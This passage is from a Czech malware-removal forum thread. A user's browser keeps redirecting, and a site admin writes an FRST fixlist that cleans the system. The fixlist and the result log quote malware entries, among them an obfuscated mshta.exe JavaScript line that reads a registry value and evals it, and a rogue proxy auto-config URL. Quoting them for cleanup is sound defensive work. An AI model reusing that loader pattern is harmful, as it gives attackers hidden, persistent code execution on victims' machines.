2017-10-10 20:23 - 2017-09-07 19:59 - 000476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2017-10-10 20:23 - 2017-09-07 19:58 - 000663040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2017-10-10 20:23 - 2017-09-07 19:58 - 000620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2017-10-10 20:23 - 2017-09-07 19:58 - 000115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2017-10-10 20:23 - 2017-09-07 19:49 - 000416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2017-10-10 20:23 - 2017-09-07 19:44 - 000073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2017-10-10 20:23 - 2017-09-07 19:44 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2017-10-10 20:23 - 2017-09-07 19:43 - 000091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2017-10-10 20:23 - 2017-09-07 19:40 - 000168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2017-10-10 20:23 - 2017-09-07 19:39 - 000076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2017-10-10 20:23 - 2017-09-07 19:37 - 000279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2017-10-10 20:23 - 2017-09-07 19:36 - 000130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2017-10-10 20:23 - 2017-09-07 19:29 - 004547072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2017-10-10 20:23 - 2017-09-07 19:29 - 000230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2017-10-10 20:23 - 2017-09-07 19:26 - 000694784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2017-10-10 20:23 - 2017-09-07 19:25 - 002058752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2017-10-10 20:23 - 2017-09-07 19:25 - 001155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2017-10-10 20:23 - 2017-09-07 19:17 - 013677568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2017-10-10 20:23 - 2017-09-07 19:01 - 002767872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2017-10-10 20:23 - 2017-09-07 18:57 - 001316864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2017-10-10 20:23 - 2017-09-07 18:57 - 000710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2017-10-10 20:23 - 2017-09-07 16:31 - 002851328 _____ (Microsoft Corporation) C:\Windows\system32\themeui.dll
2017-10-10 20:23 - 2017-09-07 16:12 - 002755072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\themeui.dll
2017-10-10 20:23 - 2017-09-07 15:55 - 000461312 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2017-10-10 20:23 - 2017-09-07 15:55 - 000405504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2017-10-10 20:23 - 2017-09-07 15:55 - 000168448 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2017-10-10 20:23 - 2017-08-19 16:28 - 004121600 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2017-10-10 20:23 - 2017-08-19 16:28 - 000206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2017-10-10 20:23 - 2017-08-19 16:28 - 000002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2017-10-10 20:23 - 2017-08-19 16:10 - 003209216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2017-10-10 20:23 - 2017-08-19 16:10 - 000103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2017-10-10 20:23 - 2017-08-19 16:10 - 000002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2017-10-10 20:23 - 2017-08-19 16:08 - 000055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2017-10-10 20:23 - 2017-08-19 16:08 - 000024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2017-10-10 20:23 - 2017-08-19 15:57 - 000050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2017-10-10 20:23 - 2017-08-19 15:57 - 000023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2017-10-10 20:23 - 2017-08-14 18:35 - 001032192 _____ (Microsoft Corporation) C:\Windows\system32\rdpcore.dll
2017-10-10 20:23 - 2017-08-14 18:35 - 000827904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpcore.dll
2017-10-10 20:23 - 2017-08-14 18:35 - 000022528 _____ (Microsoft Corporation) C:\Windows\system32\icaapi.dll
2017-10-10 20:23 - 2017-08-13 22:45 - 000040448 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2017-10-02 15:36 - 2017-10-06 10:38 - 000000000 ____D C:\Users\CAM\AppData\Roaming\ZSSDVol

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-11-01 03:51 - 2009-07-14 05:45 - 000035312 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-11-01 03:51 - 2009-07-14 05:45 - 000035312 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-10-31 14:43 - 2011-04-12 09:34 - 001275164 _____ C:\Windows\system32\perfh005.dat
2017-10-31 14:43 - 2011-04-12 09:34 - 000337258 _____ C:\Windows\system32\perfc005.dat
2017-10-31 14:43 - 2009-07-14 06:13 - 003207196 _____ C:\Windows\system32\PerfStringBackup.INI
2017-10-31 14:43 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2017-10-31 14:40 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\system32\inetsrv
2017-10-31 14:38 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2017-10-31 14:37 - 2017-02-16 07:41 - 000000000 ____D C:\ProgramData\NVIDIA
2017-10-31 11:37 - 2017-03-14 10:22 - 000000000 ____D C:\Users\MSSQLFDLauncher$HORRY
2017-10-31 11:37 - 2017-02-16 07:43 - 000000000 ____D C:\Users\MSSQLFDLauncher
2017-10-31 11:36 - 2017-03-14 10:23 - 000000000 ____D C:\Users\ReportServer$HORRY
2017-10-31 11:36 - 2017-03-14 10:22 - 000000000 ____D C:\Users\MSSQL$HORRY
2017-10-31 11:36 - 2017-02-16 07:43 - 000000000 ____D C:\Users\ReportServer
2017-10-31 11:36 - 2017-02-16 07:43 - 000000000 ____D C:\Users\MSSQLSERVER
2017-10-31 11:35 - 2009-07-14 05:45 - 000582904 _____ C:\Windows\system32\FNTCACHE.DAT
2017-10-31 10:05 - 2017-02-16 15:45 - 000000000 ____D C:\Users\CAM\Documents\Visual Studio 2015
2017-10-31 09:58 - 2016-05-06 11:06 - 000000000 ____D C:\Users\CAM\AppData\Local\CrashDumps
2017-10-31 09:21 - 2017-02-16 14:16 - 000152816 _____ C:\Users\CAM\AppData\Local\GDIPFONTCACHEV1.DAT
2017-10-31 07:51 - 2014-06-12 05:55 - 000000000 ____D C:\FGS40
2017-10-30 05:45 - 2016-03-23 11:38 - 000000000 ____D C:\ProgramData\KMSAutoS
2017-10-30 05:34 - 2014-09-02 10:45 - 000000000 ____D C:\Users\CAM\AppData\Local\Adobe
2017-10-30 05:33 - 2017-03-29 15:03 - 000004408 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-10-30 05:33 - 2016-01-28 16:36 - 000004508 _____ C:\Windows\System32\Tasks\Adobe Flash Player PPAPI Notifier
2017-10-30 05:33 - 2014-06-11 07:27 - 000803328 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-10-30 05:33 - 2014-06-11 07:27 - 000144896 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-10-30 05:33 - 2014-06-11 07:27 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2017-10-30 05:33 - 2014-06-11 07:27 - 000000000 ____D C:\Windows\system32\Macromed
2017-10-28 11:21 - 2017-07-04 07:43 - 000000000 ____D C:\Users\DefaultAppPool
2017-10-23 07:32 - 2016-04-01 11:13 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2017-10-23 05:14 - 2017-02-16 07:34 - 000000000 ____D C:\Windows\Panther
2017-10-23 05:14 - 2015-04-20 11:49 - 000001908 _____ C:\Windows\diagwrn.xml
2017-10-23 05:14 - 2015-04-20 11:49 - 000001908 _____ C:\Windows\diagerr.xml
2017-10-11 04:05 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\rescache
2017-10-11 02:16 - 2009-07-14 03:34 - 000000507 _____ C:\Windows\win.ini
2017-10-11 02:13 - 2017-02-16 15:07 - 003181846 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2017-10-11 02:03 - 2009-07-14 04:20 - 000000000 ____D C:\Program Files\Common Files\Microsoft Shared
2017-10-06 10:38 - 2017-09-27 14:11 - 000000000 ____D C:\Users\Classic .NET AppPool
2017-10-04 06:57 - 2017-01-18 07:31 - 000002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk

==================== Files in the root of some directories =======

2016-04-15 12:52 - 2016-04-15 12:52 - 000005120 _____ () C:\Users\CAM\AppData\Roaming\GiftBag.db
2015-10-12 06:08 - 2015-10-12 06:08 - 000018944 ___SH () C:\Users\CAM\AppData\Roaming\Thumbs.db
2015-10-12 06:08 - 2016-04-12 10:40 - 000052736 ___SH () C:\Users\CAM\AppData\Roaming\Microsoft\Thumbs.db
2017-03-09 16:33 - 2017-03-09 16:33 - 000000757 _____ () C:\Users\CAM\AppData\Local\recently-used.xbel
2017-03-09 16:01 - 2017-03-09 16:01 - 000000218 _____ () C:\Users\CAM\AppData\Local\recently-used.xbel.bak
2017-08-05 06:31 - 2017-08-05 06:31 - 000007620 _____ () C:\Users\CAM\AppData\Local\Resmon.ResmonCfg

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed



===***===***===***=== Extract of Additional scan result of Farbar Recovery Scan Tool ===***===***===***===

==================== Drive and Memory info ===================



==================== MBR and Partition Table ==================


==================== Scheduled Tasks (whitelisted) ==================

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

==================== Alternate Data Streams (whitelisted) ==================


==================== Security Center ==================

AV: Microsoft Security Essentials (Enabled - Up to date) {71A27EC9-3DA6-45FC-60A7-004F623C6189}
AS: Microsoft Security Essentials (Enabled - Up to date) {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}



===***===***===***=== Supplementary Scan createdy by FRSTLauncher ===***===***===***===
Posledni aktualizace FRSTLauncheru: 25_11_2013 (01)
Posledni aktualizace Modifikacniho skriptu: 30_09_2013 (01)

  
***** Velikost "Plochy" *****

Velikost slozky "C:\Users\CAM\Desktop" je 4386 MB.
 
 
***** Startup Programs *****
 
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Acrobat Assistant 8.0
"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" 

HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe ARM
"C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe" -launchedbylogin [x]

HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe Reader Speed Launcher
"C:\Users\CAM\AppData\Roaming\Seznam.cz\szninstall.exe" -c [x]

HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AdobeAAMUpdater-1.0
"C:\Users\CAM\AppData\Roaming\Seznam.cz\bin\wszndesktop.exe" -q [x]

HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AdobeCS6ServiceManager
"C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun [x]

HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Autodesk Sync
C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe 

HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\cz.seznam.software.autoupdate
"C:\Program Files (x86)\Seznam.cz\distribution\szninstall.exe" -s -d listicka 1 szn-software-listicka cz.seznam.software.autoupdate [x]

HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\cz.seznam.software.szndesktop
"C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" 

HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\DAEMON Tools Lite
"C:\Program Files (x86)\TC UP\TC UP.exe" /wnd=max [x]

HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\IAStorIcon
Re§im ECHO je vypnut.

HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\seznam-listicka-distribuce
Re§im ECHO je vypnut.

HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SunJavaUpdateSched
Re§im ECHO je vypnut.

HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TC UP
Re§im ECHO je vypnut.

HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Service Fabric Local Cluster Manager.lnk
C:\PROGRA~1\MIA713~1\SERVIC~1\Tools\SERVIC~2\SERVIC~1.EXE  

 
***** Firewall rules *****

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
    EnableFirewall    REG_DWORD    0x1
    DisableNotifications    REG_DWORD    0x0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
    EnableFirewall    REG_DWORD    0x1
    DisableNotifications    REG_DWORD    0x0

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
 
 
***** System Restore *****

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]

 
==================== End Of Log ==============================
Přílohy
Addition.zip
(16.63 KiB) Staženo 86 x
Nahoru
veny
Návštěvník
Návštěvník
Příspěvky: 25
Registrován: 27 srp 2006 21:27

Re: Otevírání nevyžádaných stránek v prohlížeči

#5 Příspěvek od veny »

Ahoj
chtěl jsem se zeptat jestli jsem něco udělal špatně,když novější příspěvky už mají odpověď a kontrolu a můj zatím bez odezvy. Pokud ano, samozřejmě napravím.

Momentální situace vypadá následovně:
Prohlížeč (Opera v.48.0.2685.52) odinstalován, smazána všechna související data (AppData apod.), očista registru.
Spuštění AdvCleaneru, který hlásil po skenu - bez nálezu.
Nová instalace prohlížeče.

Stále přetrvává Redirect a otevírání nežádoucích záložek.
Vyzkoušen i prohlížeč IE kde je stejný problém.

Díky V.
Nahoru
Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118251
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:
Kontaktovat uživatele Rudy

Re: Otevírání nevyžádaných stránek v prohlížeči

#6 Příspěvek od Rudy »

Zdravím!
Špatně jste udělal pouze to, že jste dal více postů za sebou. My, pokud vidíme, že thread má už odpovědi, neotevíráme jej (kdybychom to dělali, neuděláme nic). Otevíráme pouze takové, které mají 0, max. 1 odpověď. Jen info pro příště. :)

Otevřte poznámkový blok a zkopírujte do něj:
Start
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\...\Run: [*yyixt<*>] => "C:\Users\CAM\AppData\Local\a5d330da\91eaeea4.bat" <==== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\...\MountPoints2: {658228cd-f130-11e3-b477-806e6f6e6963} - E:\ppk.exe
AutoConfigURL: [S-1-5-21-834650113-1102577966-3259890034-1000] => hxxp://web-quick-access.com/wpad.dat?b4dfed9846cc3cf5ff885fa5efcbf18f36423907
ManualProxies: 0hxxp://web-quick-access.com/wpad.dat?b4dfed9846cc3cf5ff885fa5efcbf18f36423907
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2017-03-29] (Google Inc.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2017-03-29] (Google Inc.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2017-03-29] (Google Inc.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2017-03-29] (Google Inc.)
DPF: HKLM-x32 {A8F2B9BD-A6A0-486A-9744-18920D898429} hxxp://www.sibelius.com/download/software/win/ ... Plugin.cab
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - No File
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - No File
Handler: mso-minsb-roaming.16 - No CLSID Value
Handler: osf-roaming.16 - No CLSID Value
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
CHR Extension: (电脑管家上网防护) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\ooebklgpfnbcnpokahmdidgbmlcdepkm [2017-02-16]
C:\ProgramData\KMSAutoS
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\Software\Classes\64e1ec85: "C:\Windows\system32\mshta.exe" "javascript:E0imkJw="Ie";Ch74=new ActiveXObject("WScript.Shell");mOAj43="tR1Qjj";RJJ1Q8=Ch74.RegRead("HKCU\\software\\hfnmncsdhf\\lhfd");e68iUBha="UG";eval(RJJ1Q8);vrj7FY="Ev3nAm";" <==== ATTENTION
Task: {8C132DA4-B8DB-4D9E-9528-97A2A24A17D3} - System32\Tasks\KMSAutoNet => C:\ProgramData\KMSAutoS\KMSAuto Net.exe [2015-08-10] (MSFree Inc.)

EmptyTemp:
End
Z logu:
Velikost slozky "C:\Users\CAM\Desktop" je 4386 MB.
To je příliš mnoho a může to způsobovat zpomalení startu systému. Vytvořte v C:\Users\CAM novou složku, do níž přesuňte všechna data z plochy (kromě zástupců). Na plochu si pak dejte zástupce té složky pro snazší přístup.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Nahoru
veny
Návštěvník
Návštěvník
Příspěvky: 25
Registrován: 27 srp 2006 21:27

Re: Otevírání nevyžádaných stránek v prohlížeči

#7 Příspěvek od veny »

děkuji za upozornění
ten txt soubor mám použít ppro FRST a fix že? uložit jako fixlist.txt?

velikost složky Plochy jsem zredukoval, bohužel je nás vícero uživatelů pod jedním účtem tak se nedá všechno uhlídat.


EDIT:
fix proběhl

krátký test prohlížečů vypadá velice dobře, žádné přesměrování ani změna vyhledávače se zatím nekonal

Děkuji mnohokrát a prosím o LOCK

v případě potřeby požádám o odemčení

V.
Nahoru
Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118251
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:
Kontaktovat uživatele Rudy

Re: Otevírání nevyžádaných stránek v prohlížeči

#8 Příspěvek od Rudy »

Ano. Já to tam zapoměl vykopírovat:
Uložte na plochu jako fixlist.txt. Spusťte znovu FRST a klikněte na >Fix<. Po skončení akce se objeví log, který sem zkopírujte.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Nahoru
veny
Návštěvník
Návštěvník
Příspěvky: 25
Registrován: 27 srp 2006 21:27

Re: Otevírání nevyžádaných stránek v prohlížeči

#9 Příspěvek od veny »

tak preventivně přikládám ještě log po FIXu
vypadá to že je vše OK
díky moc

Kód: Vybrat vše

Fix result of Farbar Recovery Scan Tool (x64) Version: 02-11-2017
Ran by CAM (06-11-2017 15:45:17) Run:1
Running from C:\Users\CAM\Desktop
Loaded Profiles: CAM & ReportServer$HORRY & MSSQLFDLauncher$HORRY & MSSQL$HORRY & ReportServer & MSSQLFDLauncher & MSSQLSERVER (Available Profiles: CAM & postgres & vaclav & ReportServer$HORRY & MSSQLFDLauncher$HORRY & MSSQL$HORRY & ReportServer & MSSQLFDLauncher & MSSQLSERVER & Classic .NET AppPool & DefaultAppPool)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\...\Run: [*yyixt<*>] => "C:\Users\CAM\AppData\Local\a5d330da\91eaeea4.bat" <==== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\...\MountPoints2: {658228cd-f130-11e3-b477-806e6f6e6963} - E:\ppk.exe
AutoConfigURL: [S-1-5-21-834650113-1102577966-3259890034-1000] => hxxp://web-quick-access.com/wpad.dat?b4 ... 8f36423907
ManualProxies: 0hxxp://web-quick-access.com/wpad.dat?b4dfed9846cc3cf5ff885fa5efcbf18f36423907
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2017-03-29] (Google Inc.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2017-03-29] (Google Inc.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2017-03-29] (Google Inc.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2017-03-29] (Google Inc.)
DPF: HKLM-x32 {A8F2B9BD-A6A0-486A-9744-18920D898429} hxxp://www.sibelius.com/download/softwa ... Plugin.cab
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - No File
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - No File
Handler: mso-minsb-roaming.16 - No CLSID Value
Handler: osf-roaming.16 - No CLSID Value
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
CHR Extension: (电脑管家上网防护) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\ooebklgpfnbcnpokahmdidgbmlcdepkm [2017-02-16]
C:\ProgramData\KMSAutoS
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\Software\Classes\64e1ec85: "C:\Windows\system32\mshta.exe" "javascript:E0imkJw="Ie";Ch74=new ActiveXObject("WScript.Shell");mOAj43="tR1Qjj";RJJ1Q8=Ch74.RegRead("HKCU\\software\\hfnmncsdhf\\lhfd");e68iUBha="UG";eval(RJJ1Q8);vrj7FY="Ev3nAm";" <==== ATTENTION
Task: {8C132DA4-B8DB-4D9E-9528-97A2A24A17D3} - System32\Tasks\KMSAutoNet => C:\ProgramData\KMSAutoS\KMSAuto Net.exe [2015-08-10] (MSFree Inc.)

EmptyTemp:
End
*****************

HKU\S-1-5-21-834650113-1102577966-3259890034-1000\Software\Microsoft\Windows\CurrentVersion\Run\\*yyixt<*> => value not found.
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{658228cd-f130-11e3-b477-806e6f6e6963} => key removed successfully
HKLM\Software\Classes\CLSID\{658228cd-f130-11e3-b477-806e6f6e6963} => key not found. 
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\AutoConfigURL => value removed successfully
HKLM\SYSTEM\CurrentControlSet\services\NlaSvc\Parameters\Internet\ManualProxies\\ => value removed successfully
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AA58ED58-01DD-4d91-8333-CF10577473F7} => key removed successfully
HKLM\Software\Classes\CLSID\{AA58ED58-01DD-4d91-8333-CF10577473F7} => key removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AA58ED58-01DD-4d91-8333-CF10577473F7} => key removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{AA58ED58-01DD-4d91-8333-CF10577473F7} => key removed successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\{2318C2B1-4965-11d4-9B18-009027A5CD4F} => value removed successfully
HKLM\Software\Classes\CLSID\{2318C2B1-4965-11d4-9B18-009027A5CD4F} => key removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{2318C2B1-4965-11d4-9B18-009027A5CD4F} => value removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{2318C2B1-4965-11d4-9B18-009027A5CD4F} => key removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Code Store Database\Distribution Units\{A8F2B9BD-A6A0-486A-9744-18920D898429} => key removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{A8F2B9BD-A6A0-486A-9744-18920D898429} => key removed successfully
HKLM\Software\Classes\PROTOCOLS\Handler\livecall => key removed successfully
HKLM\Software\Classes\CLSID\{828030A1-22C1-4009-854F-8E305202313F} => key not found. 
HKLM\Software\Classes\PROTOCOLS\Handler\msnim => key removed successfully
HKLM\Software\Classes\CLSID\{828030A1-22C1-4009-854F-8E305202313F} => key not found. 
HKLM\Software\Classes\PROTOCOLS\Handler\mso-minsb-roaming.16 => key removed successfully
HKLM\Software\Classes\PROTOCOLS\Handler\osf-roaming.16 => key removed successfully
HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE => key removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE => key removed successfully
CHR Extension: (电脑管家上网防护) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\ooebklgpfnbcnpokahmdidgbmlcdepkm [2017-02-16] => Error: No automatic fix found for this entry.
C:\ProgramData\KMSAutoS => moved successfully
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\Software\Classes\64e1ec85 => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8C132DA4-B8DB-4D9E-9528-97A2A24A17D3} => key removed successfully
